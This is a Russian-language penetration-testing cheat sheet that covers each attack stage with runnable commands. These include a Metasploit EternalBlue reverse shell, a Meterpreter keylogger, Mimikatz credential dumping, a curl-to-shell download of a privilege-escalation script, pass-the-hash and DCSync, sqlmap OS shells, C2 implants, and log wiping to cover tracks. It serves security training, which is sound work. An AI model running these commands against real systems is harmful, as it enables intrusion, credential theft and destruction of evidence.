Арсенал пентестера: все инструменты от разведки до закрепления
📌 Что это / Зачем это нужно
Пентест — это не один инструмент, а цепочка этапов, где каждый инструмент решает свою задачу. Как в военной операции: сначала спутниковая разведка, потом анализ слабых мест, потом удар, потом работа десанта внутри.
Эта шпаргалка — полная карта арсенала, расставленная в логическом порядке: от первого контакта с целью до полного контроля и заметания следов. Каждый инструмент — с аналогией, назначением и примерами команд.
⚡ Общая схема атаки (Kill Chain)
- Пассивная разведка (OSINT) — собираем информацию не касаясь цели
- Активная разведка (сканирование) — сканируем цель, находим порты и сервисы
- Анализ уязвимостей — определяем слабые места
- Эксплуатация — пробиваем защиту, получаем доступ
- Пост-эксплуатация — закрепляемся, собираем данные, двигаемся по сети
- Атаки на пароли — ломаем хэши, брутфорсим сервисы
- Атаки на веб-приложения — отдельная ветка, свои инструменты
- Атаки на Active Directory — корпоративные сети Windows
- Заметание следов — чистим логи, убираем артефакты
Ниже — инструменты по каждому этапу.
🔍 Этап 1: Пассивная разведка (OSINT)
Собираем всё что можно не прикасаясь к цели. Цель не знает что её изучают.
Аналогия: изучаешь здание через Google Maps, читаешь о нём в новостях, смотришь кто там работает через LinkedIn — но даже не подходишь к нему.
theHarvester
Что это: сборщик email-адресов, поддоменов, IP-адресов и имён сотрудников из открытых источников (Google, Bing, LinkedIn, Shodan, crt.sh).
Аналогия: шпион, который читает газеты, телефонные справочники и корпоративные отчёты, не выходя из офиса.
Зачем: получить список email-ов для фишинга, найти поддомены (забытый dev.company.com может быть дырявым), узнать IP-диапазоны.
# Собрать email и поддомены компании
theHarvester -d company.com -b google,bing,linkedin -l 200
# Только поддомены через crt.sh
theHarvester -d company.com -b crtsh
Дополняет: результаты передаёшь в Nmap (IP-адреса) и в инструменты фишинга (email-ы).
Maltego
Что это: визуальный OSINT-инструмент для построения связей между людьми, доменами, IP, email, соцсетями, компаниями. Рисует граф взаимосвязей.
Аналогия: детективная доска с фотографиями, нитками и кнопками. Как в кино, когда следователь связывает подозреваемых, адреса и события.
Зачем: увидеть полную картину: кто связан с кем, какие домены принадлежат компании, какие серверы за ними стоят, кто администрирует.
# GUI-инструмент, запуск:
maltego
# Работа через "трансформы" — автоматические запросы к источникам данных
# Вводишь домен → получаешь граф: поддомены, IP, email, люди, технологии
Дополняет: даёт стратегическую картину перед началом активного сканирования.
Sherlock / Maigret
Что это: поиск аккаунтов по никнейму на сотнях платформ.
Аналогия: частный детектив, который по одному псевдониму находит все профили человека в интернете.
Зачем: деанон. Нашёл никнейм админа → нашёл его GitHub, Twitter, форумы → нашёл email → нашёл реальное имя.
# Sherlock — быстрый поиск
sherlock username
# Maigret — более глубокий поиск (больше сайтов)
maigret username
Дополняет: работает в связке с theHarvester и Maltego для построения полного профиля цели.
Shodan
Что это: поисковик по устройствам, подключённым к интернету. Сканирует весь интернет и индексирует открытые порты, сервисы, баннеры.
Аналогия: Google, но не для сайтов, а для серверов, камер, роутеров, промышленных систем. Показывает что торчит наружу.
Зачем: найти открытые сервисы цели без сканирования (пассивно), обнаружить забытые серверы, IoT-устройства, дефолтные пароли на камерах.
# CLI-поиск (нужен API-ключ)
shodan search "hostname:company.com"
# Поиск уязвимых сервисов
shodan search "Apache 2.4.49" # известная RCE-уязвимость
# Информация по IP
shodan host 1.2.3.4
# Или через веб: shodan.io
Дополняет: альтернатива активному сканированию Nmap. Не оставляет следов на цели.
🎯 Этап 2: Активная разведка (сканирование)
Теперь трогаем цель — отправляем пакеты, сканируем порты, определяем сервисы. Цель может это заметить в логах.
Аналогия: подошёл к зданию, обошёл по периметру, подёргал двери, заглянул в окна. Охрана может заметить.
Nmap
Что это: король сетевых сканеров. Находит открытые порты, определяет сервисы и их версии, ОС, запускает скрипты для детекции уязвимостей.
Аналогия: спутниковая разведка + разведгруппа в одном. Показывает полную карту объекта: все входы, что за каждой дверью, какие замки.
Зачем: первый шаг активной разведки. Без Nmap ты слепой — не знаешь что открыто и что работает на цели.
# Быстрое сканирование — найти открытые порты
nmap -sV 192.168.1.10
# Полное сканирование всех портов + ОС + скрипты
nmap -A -p- 192.168.1.10
# Скрытное SYN-сканирование (меньше палится в логах)
nmap -sS -T2 192.168.1.10
# Сканирование подсети
nmap -sn 192.168.1.0/24
# Скрипты для поиска уязвимостей
nmap --script vuln 192.168.1.10
# Сохранить результат
nmap -A -oN scan_result.txt 192.168.1.10
Ключевые флаги:
-sS— SYN-скан (скрытный, не завершает TCP-хендшейк)-sV— определение версий сервисов-O— определение ОС-A— агрессивный скан (версии + ОС + скрипты + трассировка)-p-— все 65535 портов-T0..T5— скорость (T0 = параноидально медленный, T5 = безумно быстрый)--script— NSE-скрипты (vuln, exploit, brute, discovery)
Дополняет: результаты Nmap → в Nessus (для детального анализа уязвимостей) → в Metasploit (для эксплуатации).
Masscan
Что это: сверхбыстрый сканер портов. Может просканировать весь интернет за 6 минут.
Аналогия: если Nmap — снайпер (точный, детальный), то Masscan — ковровая бомбардировка (быстро, но грубо).
Зачем: когда нужно просканировать огромный диапазон IP на конкретные порты. Сначала Masscan находит что открыто, потом Nmap детально изучает найденное.
# Сканирование подсети на порты 80, 443, 8080
masscan 192.168.1.0/24 -p80,443,8080 --rate=1000
# Результат в Nmap-совместимом формате
masscan 10.0.0.0/8 -p445 --rate=10000 -oL smb_hosts.txt
Дополняет: Masscan (быстро найти) → Nmap (детально изучить).
Enum4linux / enum4linux-ng
Что это: инструмент для перечисления информации из Windows/Samba-систем через SMB/NetBIOS.
Аналогия: подошёл к проходной и спросил: «Кто тут работает? Какие отделы есть? Какие папки общие?» — и получил ответы, потому что секретарь не спрашивает удостоверение.
Зачем: вытянуть из Windows-машин списки пользователей, групп, сетевых шар, политики паролей — без аутентификации (если SMB настроен небезопасно).
# Полное перечисление
enum4linux -a 192.168.1.10
# Только пользователи
enum4linux -U 192.168.1.10
# enum4linux-ng (улучшенная версия)
enum4linux-ng -A 192.168.1.10
Дополняет: данные передаёшь в Hydra (брутфорс найденных пользователей) или в BloodHound (атаки на AD).
🛡 Этап 3: Анализ уязвимостей
Знаем что открыто — теперь ищем конкретные дыры с CVE-номерами и рейтингом критичности.
Аналогия: инспектор проверяет каждый замок, каждое окно, каждую систему сигнализации и составляет отчёт: «вот тут можно пролезть».
Nessus
Что это: профессиональный сканер уязвимостей от Tenable. Проверяет системы по базе из десятков тысяч известных уязвимостей.
Аналогия: аналитический центр разведки. Получает данные о цели и выдаёт детальный отчёт: что уязвимо, насколько критично (CVSS-оценка), как починить.
Зачем: получить список реальных уязвимостей с CVE-номерами. Без этого ты тыкаешь вслепую в Metasploit.
# Веб-интерфейс: https://localhost:8834
# Бесплатная версия: Nessus Essentials (до 16 IP)
# Создаёшь скан → указываешь цели → запускаешь → получаешь отчёт
# Отчёт показывает:
# - CVE-номер уязвимости
# - CVSS-оценку (0-10)
# - Описание и рекомендации по исправлению
# - Ссылку на эксплойт (если есть)
Дополняет: Nmap (найти что открыто) → Nessus (найти уязвимости) → Metasploit (эксплуатировать).
OpenVAS (Greenbone)
Что это: бесплатная open-source альтернатива Nessus. Тот же принцип — сканирование на уязвимости.
Аналогия: тот же аналитический центр, но бесплатный и с меньшим бюджетом. Работает хорошо, но интерфейс и скорость уступают Nessus.
Зачем: когда нужен сканер уязвимостей, но платить за Nessus не хочешь.
# Установка через Docker
docker run -d -p 443:443 --name openvas greenbone/openvas
# Веб-интерфейс: https://localhost
# Логин по умолчанию: admin / admin
Дополняет: замена Nessus для тех, кому нужен бесплатный вариант.
Nikto
Что это: сканер веб-серверов. Проверяет на известные уязвимости, опасные конфигурации, дефолтные файлы и директории.
Аналогия: инспектор, который проверяет только двери веб-сервера: «дефолтный пароль на админке? конфигурационные файлы торчат наружу? phpinfo() доступен?»
Зачем: быстрая проверка веб-сервера на очевидные косяки перед глубоким анализом через Burp Suite.
# Базовое сканирование
nikto -h http://192.168.1.10
# С указанием порта
nikto -h http://192.168.1.10:8080
# Сохранить отчёт
nikto -h http://192.168.1.10 -o report.html -Format htm
Дополняет: Nikto (быстрая проверка веба) → Burp Suite (глубокий анализ).
🚀 Этап 4: Эксплуатация
Нашли дыры — теперь пробиваем защиту. Подбираем эксплойт, выбираем payload, получаем доступ.
Аналогия: ракетный командный центр. Выбираешь ракету (эксплойт) под тип цели, заряжаешь боеголовку (payload), наводишь (RHOSTS/LHOST), запускаешь.
Metasploit Framework
Что это: главный фреймворк для эксплуатации. Тысячи готовых эксплойтов, сотни payload-ов, модули разведки, пост-эксплуатации — всё в одной консоли.
Аналогия: ракетный командный центр с арсеналом. Склад ракет (эксплойтов), склад боеголовок (payload-ов), пусковая установка (handler), система наведения (настройки), десантные модули (post).
Зачем: эксплуатация известных уязвимостей. Если Nessus нашёл CVE — ищешь эксплойт в Metasploit и используешь.
# Запуск
msfconsole
# Поиск эксплойта по CVE
search cve:2017-0144
# Или по ключевому слову
search eternalblue
# Использовать эксплойт
use exploit/windows/smb/ms17_010_eternalblue
# Посмотреть параметры
show options
# Настроить
set RHOSTS 192.168.1.10 # цель
set LHOST 192.168.1.5 # твой IP
set LPORT 4444 # твой порт
set payload windows/x64/meterpreter/reverse_tcp
# Запуск
run
Ключевые модули:
exploit/— эксплойты (пробивают уязвимость)payload/— полезная нагрузка (что выполняется после)auxiliary/— вспомогательные (сканеры, брутфорсеры, фаззеры)post/— пост-эксплуатация (сбор данных, закрепление)encoder/— обфускация payload для обхода антивирусов
Дополняет: Nmap + Nessus → Metasploit → Meterpreter (пост-эксплуатация).
searchsploit / Exploit-DB
Что это: локальная база эксплойтов из Exploit-DB. Ищет эксплойты по имени сервиса, CVE, версии — без интернета.
Аналогия: каталог оружия. Знаешь модель замка (версию софта) — находишь подходящую отмычку.
Зачем: когда в Metasploit нет эксплойта — ищешь в searchsploit. Там могут быть PoC-скрипты на Python, C, Ruby.
# Поиск по имени сервиса
searchsploit apache 2.4.49
# Поиск по CVE
searchsploit CVE-2021-41773
# Скопировать эксплойт в текущую папку
searchsploit -m 50383
# Обновить базу
searchsploit -u
Дополняет: запасной арсенал, когда в Metasploit нужного эксплойта нет.
🔧 Этап 5: Пост-эксплуатация
Мы внутри. Теперь нужно закрепиться, собрать данные и двигаться дальше по сети.
Аналогия: десантная группа высадилась. Теперь разведка внутри здания, установка жучков, поиск документов, открытие дверей в другие отделы.
Meterpreter (часть Metasploit)
Что это: продвинутая оболочка, которая работает в памяти целевой машины. Не создаёт файлов на диске — сложнее обнаружить.
Аналогия: десантная группа с полным снаряжением. Не просто стоят внутри — у них камеры, отмычки, рации, взрывчатка для сейфов.
Зачем: после эксплуатации — полный контроль: файлы, скриншоты, камера, кейлоггер, дамп паролей, миграция между процессами.
# После успешной эксплуатации ты в meterpreter >
sysinfo # информация о системе
getuid # текущий пользователь
getsystem # попытка повысить привилегии до SYSTEM
hashdump # дамп хэшей паролей
screenshot # скриншот экрана
keyscan_start # запуск кейлоггера
keyscan_dump # прочитать нажатия клавиш
download C:\\secrets.txt # скачать файл
upload backdoor.exe C:\\ # загрузить файл
shell # обычный cmd/bash терминал
ps # список процессов
migrate 1234 # мигрировать в другой процесс
run post/windows/gather/credentials/credential_collector
Дополняет: Metasploit (попал внутрь) → Meterpreter (работаешь внутри).
LinPEAS / WinPEAS
Что это: скрипты для автоматического поиска путей повышения привилегий на Linux (LinPEAS) и Windows (WinPEAS).
Аналогия: собака-ищейка внутри здания. Бегает по всем этажам и помечает: «тут дверь без замка», «тут ключ от сейфа лежит под ковриком», «тут можно пролезть в вентиляцию».
Зачем: после получения shell ты часто обычный пользователь. Нужно стать root/SYSTEM. PEAS-скрипты автоматически находят: SUID-бинари, cron-задачи от root, writable-файлы, слабые разрешения, токены, пароли в конфигах.
# На цели (Linux):
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Или загрузить через meterpreter:
upload linpeas.sh /tmp/
shell
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh
# Windows:
upload winPEAS.exe C:\\Temp\\
shell
C:\Temp\winPEAS.exe
Дополняет: Meterpreter (попал внутрь как обычный юзер) → LinPEAS/WinPEAS (нашёл путь к root) → повышение привилегий.
Mimikatz
Что это: инструмент для извлечения паролей, хэшей, Kerberos-тикетов и PIN-кодов из памяти Windows.
Аналогия: взломщик сейфов, который не ломает сейф, а читает комбинацию из записки, приклеенной на мониторе. Windows хранит пароли/хэши в памяти — Mimikatz их оттуда вытаскивает.
Зачем: получить пароли и хэши для доступа к другим машинам в сети (lateral movement). Один хэш доменного админа — и вся сеть твоя.
# Через meterpreter:
load kiwi
creds_all # все учётные данные из памяти
# Или напрямую на машине:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # пароли в открытом виде
sekurlsa::wdigest # wdigest-пароли
lsadump::sam # дамп SAM-базы
kerberos::list # Kerberos-тикеты
Дополняет: Meterpreter (доступ к машине) → Mimikatz (извлечь пароли) → использовать для доступа к другим машинам.
Cobalt Strike / Sliver
Что это: C2-фреймворки (Command & Control). Профессиональные платформы для управления множеством взломанных машин, с продвинутым обходом антивирусов.
Аналогия: если Metasploit — ракетный командный центр, то Cobalt Strike — это штаб генерала, который управляет множеством десантных групп на разных объектах одновременно. Шифрованные каналы связи, смена позывных, маскировка под легитимный трафик.
Зачем: реальные red team операции в корпоративных сетях. Когда нужно управлять 50+ взломанными машинами, обходить EDR, маскировать трафик.
- Cobalt Strike — коммерческий ($5,900/год), стандарт индустрии red team
- Sliver — бесплатный open-source аналог от BishopFox
# Sliver (бесплатный)
sliver-server # запуск сервера
generate --mtls --os windows # создать имплант
mtls --lhost 10.0.0.1 # запустить listener
sessions # список активных сессий
use SESSION_ID # управлять машиной
Дополняет: замена Metasploit для продвинутых операций, когда нужен стелс и управление множеством целей.
🔑 Этап 6: Атаки на пароли
Отдельная ветка — ломаем пароли и хэши на всех этапах.
Аналогия: слесарная мастерская. Подбираешь ключи, делаешь дубликаты, ломаешь замки перебором.
Hydra
Что это: онлайн-брутфорсер. Перебирает пароли напрямую к сервисам: SSH, FTP, HTTP, RDP, SMB, базы данных.
Аналогия: робот, который стоит у двери и пробует ключи один за другим с бешеной скоростью.
Зачем: когда знаешь логин (нашёл через enum4linux или theHarvester) и хочешь подобрать пароль к живому сервису.
# Брутфорс SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# Брутфорс FTP
hydra -L users.txt -P passwords.txt ftp://192.168.1.10
# Брутфорс HTTP-формы
hydra -l admin -P rockyou.txt 192.168.1.10 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid credentials"
# Брутфорс RDP
hydra -l administrator -P rockyou.txt rdp://192.168.1.10
Дополняет: enum4linux (нашёл пользователей) → Hydra (подобрал пароли).
Hashcat
Что это: офлайн-взломщик хэшей. Использует GPU для перебора — в десятки раз быстрее CPU.
Аналогия: суперкомпьютер для подбора комбинаций к сейфу. Работает не с живым сервисом, а с украденным хэшем — можно перебирать миллиарды вариантов в секунду.
Зачем: когда через Mimikatz или hashdump получил хэши паролей — нужно восстановить из них пароли в открытом виде.
# NTLM хэш (Windows)
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
# MD5
hashcat -m 0 hash.txt rockyou.txt
# С правилами (мутации: добавить цифры, заглавные и т.д.)
hashcat -m 1000 hash.txt rockyou.txt -r rules/best64.rule
# Показать взломанные
hashcat -m 1000 hash.txt --show
Основные режимы (-m):
0— MD5100— SHA11000— NTLM (Windows)1800— SHA-512 (Linux /etc/shadow)3200— bcrypt13100— Kerberoasting (TGS)
Дополняет: Mimikatz/hashdump (извлечь хэши) → Hashcat (взломать) → использовать пароли.
John the Ripper
Что это: ещё один офлайн-взломщик хэшей. Старше Hashcat, работает на CPU, поддерживает больше экзотических форматов.
Аналогия: ветеран-слесарь. Медленнее чем Hashcat, но знает больше типов замков.
Зачем: когда Hashcat не распознаёт формат хэша или нужно работать без GPU.
# Автоопределение формата
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Конкретный формат
john --format=raw-md5 hash.txt --wordlist=rockyou.txt
# Показать взломанные
john --show hash.txt
# Извлечь хэши из файлов
zip2john archive.zip > zip_hash.txt
john zip_hash.txt --wordlist=rockyou.txt
Дополняет: альтернатива Hashcat, особенно для экзотических форматов (zip, pdf, ssh keys, keepass).
🌐 Этап 7: Атаки на веб-приложения
Веб — отдельный мир со своими инструментами. Большинство современных целей — это веб-приложения.
Аналогия: если сетевые атаки — это штурм здания, то веб-атаки — это обман через приёмную. Заполняешь формы с «неправильными» данными и ломаешь логику.
Burp Suite
Что это: главный инструмент для тестирования веб-приложений. Перехватывает HTTP-запросы, модифицирует их, автоматизирует атаки.
Аналогия: рентгеновский аппарат + лаборатория для веб-трафика. Видишь каждый запрос между браузером и сервером, можешь изменить любой байт и отправить заново.
Зачем: искать SQL-инъекции, XSS, IDOR, broken auth, SSRF и другие веб-уязвимости.
# GUI-инструмент, запуск:
burpsuite
# Основные вкладки:
# Proxy — перехват и модификация запросов в реальном времени
# Repeater — отправка модифицированных запросов вручную
# Intruder — автоматический перебор параметров (брутфорс, фаззинг)
# Scanner — автоматический поиск уязвимостей (платная версия)
# Decoder — кодирование/декодирование (Base64, URL, HTML)
Бесплатная версия (Community): Proxy + Repeater + Decoder. Для начала хватит. Платная версия (Pro): + Scanner + быстрый Intruder. ~$449/год.
Дополняет: Nikto (быстрая проверка) → Burp Suite (глубокий ручной анализ).
Gobuster / Feroxbuster / ffuf
Что это: инструменты для перебора директорий и файлов на веб-сервере (directory brute-forcing).
Аналогия: обходишь все двери в коридоре и дёргаешь ручки. /admin, /backup, /config, /.git — может что-то открыто?
Зачем: найти скрытые страницы, панели администрирования, забытые бэкапы, открытые конфиг-файлы.
# Gobuster — перебор директорий
gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt
# С расширениями файлов
gobuster dir -u http://192.168.1.10 -w common.txt -x php,txt,bak,old
# ffuf — быстрый фаззер (более гибкий)
ffuf -u http://192.168.1.10/FUZZ -w common.txt
# Feroxbuster — рекурсивный перебор
feroxbuster -u http://192.168.1.10 -w common.txt
Дополняет: Nmap (нашёл веб-сервер на порту 80/443) → Gobuster (нашёл скрытые страницы) → Burp Suite (проверил на уязвимости).
SQLmap
Что это: автоматизированный инструмент для эксплуатации SQL-инъекций.
Аналогия: робот-взломщик, специализирующийся на одном типе замков — SQL-базах данных. Находит SQL-инъекцию и автоматически вытаскивает все данные.
Зачем: если нашёл потенциальную SQL-инъекцию (через Burp Suite или вручную) — SQLmap автоматически подтвердит её и выкачает базу.
# Проверить URL на SQLi
sqlmap -u "http://site.com/page?id=1" --dbs
# Из перехваченного запроса в Burp (сохранить в файл)
sqlmap -r request.txt --dbs
# Вытащить таблицы
sqlmap -u "http://site.com/page?id=1" -D database_name --tables
# Вытащить данные
sqlmap -u "http://site.com/page?id=1" -D database_name -T users --dump
# Попробовать получить shell
sqlmap -u "http://site.com/page?id=1" --os-shell
Дополняет: Burp Suite (нашёл SQLi) → SQLmap (автоматически эксплуатировал и вытащил данные).
🏢 Этап 8: Атаки на Active Directory
Корпоративные Windows-сети — отдельная дисциплина. AD — это святой грааль: получил доменного админа — контролируешь всё.
Аналогия: вместо штурма одного здания — захват целого города с централизованным управлением.
BloodHound
Что это: инструмент для визуализации и анализа связей в Active Directory. Строит граф: пользователи, группы, машины, права — и находит пути от обычного юзера до доменного админа.
Аналогия: карта города с отмеченными маршрутами: «от твоего текущего положения до мэрии можно добраться через: склад → пожарную станцию → мэрию». Показывает кратчайший путь к Domain Admin.
Зачем: в AD сотни пользователей и групп, вручную найти путь повышения привилегий невозможно. BloodHound делает это автоматически.
# 1. Собрать данные (на целевой машине):
# SharpHound.exe (Windows) или bloodhound-python (Linux)
bloodhound-python -u user -p password -d domain.local -c All
# 2. Запустить BloodHound (на Kali):
neo4j start
bloodhound
# 3. Загрузить собранные данные (ZIP-файл)
# 4. Запросы:
# "Shortest path to Domain Admin"
# "Find all Kerberoastable users"
# "Users with DCSync rights"
Дополняет: Mimikatz (получить первые креды) → BloodHound (найти путь к DA) → эксплуатация пути.
Impacket
Что это: коллекция Python-скриптов для работы с сетевыми протоколами Windows: SMB, WMI, Kerberos, LDAP, MSSQL.
Аналогия: набор универсальных ключей и отмычек для всех дверей в Windows-городе. Каждый скрипт — для своего типа двери.
Зачем: перемещение по сети (lateral movement), удалённое выполнение команд, атаки на Kerberos, дамп паролей.
# Удалённое выполнение команд через SMB
impacket-psexec domain/admin:password@192.168.1.10
# Через WMI (тише, меньше логов)
impacket-wmiexec domain/admin:password@192.168.1.10
# Pass-the-hash (без знания пароля, только хэш)
impacket-psexec -hashes :NTLM_HASH domain/admin@192.168.1.10
# Kerberoasting (извлечь TGS-хэши для офлайн-взлома)
impacket-GetUserSPNs domain/user:password -dc-ip 192.168.1.1 -request
# DCSync (дамп всех хэшей из домена — нужны права)
impacket-secretsdump domain/admin:password@192.168.1.1
Дополняет: BloodHound (нашёл путь) → Impacket (выполнил атаку) → Mimikatz (собрал ещё креды) → повторить.
Responder
Что это: инструмент для перехвата аутентификации в Windows-сетях. Отравляет LLMNR/NBT-NS/mDNS запросы и собирает NTLMv2-хэши.
Аналогия: мошенник в корпоративном здании. Когда кто-то кричит «где тут бухгалтерия?» (LLMNR-запрос), он отвечает «я бухгалтерия, покажи удостоверение» — и записывает его.
Зачем: пассивно собирать хэши паролей в корпоративной сети. Часто один из первых шагов при внутреннем пентесте.
# Запуск (нужно быть в одной сети с целями)
responder -I eth0 -dwv
# Собранные хэши будут в /usr/share/responder/logs/
# Дальше — в Hashcat для взлома:
hashcat -m 5600 hashes.txt rockyou.txt
Дополняет: Responder (собрал хэши) → Hashcat (взломал) → Impacket (зашёл на машину с паролем).
🧹 Этап 9: Заметание следов
После работы — убираем за собой. В реальном пентесте это часть отчёта. В нелегальном хакинге — обязательный этап.
Аналогия: уборщик после операции. Стирает отпечатки, убирает инструменты, восстанавливает обстановку.
Что чистить
# Linux — основные логи:
/var/log/auth.log # SSH-логины
/var/log/syslog # системные события
/var/log/apache2/access.log # веб-запросы
~/.bash_history # история команд
# Очистить историю команд:
history -c && history -w
unset HISTFILE
# Windows:
wevtutil cl Security # лог безопасности
wevtutil cl System # системный лог
wevtutil cl Application # лог приложений
# Через meterpreter:
clearev # очистить Event Log
timestomp file.exe -m "01/01/2020 00:00:00" # изменить дату файла
Важно
Если на цели стоит ELK/SIEM — логи уже ушли на отдельный сервер. Чистить локальные логи бесполезно. Именно поэтому SIEM так важен для blue team.
🧠 Полная цепочка инструментов (сводка)
Пассивная разведка: theHarvester → Maltego → Sherlock/Maigret → Shodan
Активная разведка: Masscan (быстро) → Nmap (детально) → Enum4linux (Windows/SMB)
Анализ уязвимостей: Nessus / OpenVAS (сетевые) → Nikto (веб)
Эксплуатация: Metasploit + searchsploit (запасной арсенал)
Пост-эксплуатация: Meterpreter → LinPEAS/WinPEAS (privesc) → Mimikatz (пароли)
Пароли: Hydra (онлайн) → Hashcat / John (офлайн)
Веб: Gobuster/ffuf (директории) → Burp Suite (анализ) → SQLmap (SQLi)
Active Directory: Responder (хэши) → BloodHound (путь к DA) → Impacket (lateral movement)
C2 / продвинутые: Cobalt Strike / Sliver
Следы: clearev, history -c, wevtutil
⚠️ Важные моменты
- Ни один инструмент не заменяет понимание. Metasploit без знания сетей — это обезьяна с гранатой. Учи основы: TCP/IP, DNS, HTTP, Active Directory
- Порядок важен. Нельзя эксплуатировать, не просканировав. Нельзя сканировать, не разведав. Каждый этап строится на результатах предыдущего
- Автоматизация не заменяет ручную работу. Сканеры находят 80% уязвимостей. Оставшиеся 20% — ручной анализ через Burp Suite, кастомные скрипты, логика
- Всё что ты делаешь — логируется. Если на цели стоит IDS, SIEM, EDR — каждый твой скан, каждый эксплойт, каждый брутфорс виден. Учитывай это
- Легальный пентест = письменное разрешение. Без договора с заказчиком все эти инструменты — уголовное преступление. Тренируйся в лабе: HackTheBox, TryHackMe, свой Metasploitable
- Обновляй инструменты. Новые CVE выходят каждый день.
apt update && apt upgradeв Kali — регулярно - Wordlists решают.
rockyou.txt— стандарт, но для серьёзных целей нужны кастомные словари. Генерируй черезcewl(из сайта цели) илиcrunch